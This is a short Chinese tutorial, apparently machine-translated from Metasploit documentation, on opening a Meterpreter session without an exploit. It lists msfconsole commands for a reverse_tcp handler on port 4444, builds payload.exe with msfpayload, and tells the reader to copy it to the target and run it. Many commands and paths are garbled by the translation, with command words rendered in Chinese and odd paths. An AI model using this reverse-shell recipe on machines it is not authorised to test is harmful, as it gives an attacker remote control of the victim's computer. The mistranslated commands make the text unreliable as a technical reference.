在没有漏洞的情况下本地使用Meterpreter
Metasploit职业
创建一个新项目,单击Campaigns,创建一个新的Campaign,启用USB Campaign并配置侦听端口。此时,保存活动,启动它,然后从提供的链接下载可执行文件。会话现在将出现在Sessions选项卡中。
或者,从管理菜单访问全局设置,并通过此接口配置一个新的持久侦听器,选择您希望此侦听器支持的有效负载类型(reverse_tcp, reverse_https等)。一旦设置了侦听器,请参阅下面的Metasploit框架创建可执行文件的步骤。
下面列出的用于Metasploit社区和Metasploit框架的步骤,也可以使用Metasploit Pro中的广告系列功能来使用。
Metasploit框架
首先从Windows上的“开始”菜单中启动Console或使用Linux上的“MSFPORO”或“MSFConsole”链接,打开Metasploit控制台。控制台打开后,输入以下命令:
MSF>使用Exploit / Multi / Handler
MSF Exploit(Handler)>设置有效负载Windows / MeterPreter / Reverse_TCP
msf exploit(handler) > set LHOST 192.168.0.100
msf漏洞(处理程序)>设置LPORT 4444
MSF Exploit(处理程序)>设置ExitOnsession false
MSF利用(处理程序)>利用-j
这将在后台运行处理程序侦听器。将192.168.0.100更改为您的机器的IP,但不要将其设置为127.0.0.1(这在Metasploit中是特殊大小写)。一旦侦听器运行,就到了生成实际有效负载的时间了。
打开命令shell,可以访问Metasploit环境。在Windows上,这是系统控制台的链接,在Linux上是/pt/2/diagnostic_sshell。如果MSFconsole已经在他们的路径中,Linux用户可能不需要执行此操作。
在shell中,执行以下命令:
窗户C:\ Metasploit> Ruby MSFPayload Windows / MeterPreter / Reverse_TCP LHOST = 192.168.0.100 LPORT = 4444 x> PAYLOAD.EXE
Linux.$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 X > payload.exe
将此EXE复制到您的预期目标并执行它。会话将在Metasploit控制台(或在会话选项卡中,如果您使用其中一个商业或社区产品创建侦听器)